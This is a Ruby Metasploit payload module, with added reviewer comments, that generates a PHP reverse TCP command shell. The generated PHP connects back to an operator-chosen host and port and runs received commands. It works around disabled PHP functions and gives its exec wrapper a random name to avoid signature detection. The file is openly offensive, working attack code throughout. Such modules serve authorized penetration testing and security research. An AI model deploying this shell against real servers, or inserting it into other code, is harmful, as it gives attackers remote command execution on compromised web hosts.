##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # The PHP source is assembled at generation time from LHOST/LPORT and a
  # random function name, so there is no fixed payload size to cache.
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Php
  include Msf::Sessions::CommandShellOptions

  # Registers the payload metadata (name, author, platform/arch, handler and
  # session class). The PHP itself is produced by #generate.
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'PHP Command Shell, Reverse TCP (via PHP)',
        'Description' => 'Reverse PHP connect back shell with checks for disabled functions',
        'Author' => 'egypt',
        'License' => BSD_LICENSE,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::CommandShell,
        'PayloadType' => 'cmd',
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end

  # Builds the PHP connect-back shell as a string.
  #
  # What the emitted PHP does (see the heredoc below):
  # - Starts with whatever php_preamble emits, which is expected to populate
  #   the $dis array of disabled functions used by the checks that follow.
  # - Defines a randomly named wrapper (only if no function of that name
  #   already exists) whose body comes from php_system_block and returns $o.
  # - Connects back with fsockopen when it is callable and not listed in
  #   $dis; otherwise falls back to socket_create/socket_connect with all
  #   errors suppressed, writing the marker "socket_create" first.
  # - In the read loop: a line starting with 'cd ' becomes chdir() (so the
  #   "cd does nothing" issue noted by the original author is handled here,
  #   but only for that exact prefix); 'quit'/'exit' ends the loop; anything
  #   else is run through the wrapper with its trailing newline stripped
  #   (substr($c,0,-1)). A wrapper result of === false is reported back as
  #   $nofuncs and the connection is closed.
  #
  # Caveats grounded in the code:
  # - The return value of fsockopen()/socket_connect() is never checked; on
  #   a failed connect the read loop simply never iterates (exact PHP-version
  #   behaviour of fread()/fclose() on a non-resource is not handled here).
  # - disable_functions is worked around via the helper blocks, but nothing
  #   is done about safe mode (original author's note).
  # - LHOST is interpolated into a single-quoted PHP literal; it comes from
  #   the operator's datastore, but a value containing a quote would still
  #   produce syntactically broken PHP.
  #
  # @return [String] the PHP source for the reverse shell
  def php_reverse_shell
    lhost = datastore['LHOST']
    if lhost && !lhost.empty?
      ipaddr = lhost
      port = datastore['LPORT']
    else
      # The datastore is empty while msfconsole starts up (CachedSize is
      # :dynamic), so fall back to placeholders instead of an empty host.
      ipaddr = '127.0.0.1'
      port = 4444
    end

    # Random 5-14 character name for the PHP exec wrapper, so the generated
    # source does not carry a fixed, signature-friendly function name.
    exec_funcname = Rex::Text.rand_text_alpha(rand(5..14))

    # IPv6 literals need brackets in the fsockopen URI and a different
    # address family for socket_create().
    if Rex::Socket.is_ipv6?(ipaddr)
      connect_uri = "tcp://[#{ipaddr}]"
      af = 'AF_INET6'
    else
      connect_uri = "tcp://#{ipaddr}"
      af = 'AF_INET'
    end

    php_src = <<~END_OF_PHP_CODE
      #{php_preamble(disabled_varname: "$dis")}
      $ipaddr='#{ipaddr}';
      $port=#{port};

      if(!function_exists('#{exec_funcname}')){
      function #{exec_funcname}($c){
      global $dis;
      #{php_system_block(cmd_varname: "$c", disabled_varname: "$dis", output_varname: "$o")}
      return $o;
      }
      }
      $nofuncs='no exec functions';
      if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
      $s=@fsockopen("#{connect_uri}",$port);
      while($c=fread($s,2048)){
      $out = '';
      if(substr($c,0,3) == 'cd '){
      chdir(substr($c,3,-1));
      } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
      break;
      }else{
      $out=#{exec_funcname}(substr($c,0,-1));
      if($out===false){
      fwrite($s,$nofuncs);
      break;
      }
      }
      fwrite($s,$out);
      }
      fclose($s);
      }else{
      $s=@socket_create(#{af},SOCK_STREAM,SOL_TCP);
      @socket_connect($s,$ipaddr,$port);
      @socket_write($s,"socket_create");
      while($c=@socket_read($s,2048)){
      $out = '';
      if(substr($c,0,3) == 'cd '){
      chdir(substr($c,3,-1));
      } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
      break;
      }else{
      $out=#{exec_funcname}(substr($c,0,-1));
      if($out===false){
      @socket_write($s,$nofuncs);
      break;
      }
      }
      @socket_write($s,$out,strlen($out));
      }
      @socket_close($s);
      }
    END_OF_PHP_CODE

    # NOTE(review): Rex::Text.randomize_space appears to return a new string
    # (gsub-style) rather than mutating its argument, so with the result
    # discarded here the whitespace is NOT actually randomized and the PHP is
    # returned verbatim. Do not simply assign the result back without testing:
    # a whitespace rewrite would also change the inside of quoted PHP
    # literals such as 'cd ' above, which the loop compares against with a
    # fixed-length substr($c,0,3), and would break 'cd' handling. Confirm the
    # helper's semantics before enabling.
    Rex::Text.randomize_space(php_src)

    php_src
  end

  # Constructs the payload: the framework-generated prefix from super
  # followed by the PHP shell source.
  def generate(_opts = {})
    super + php_reverse_shell
  end
end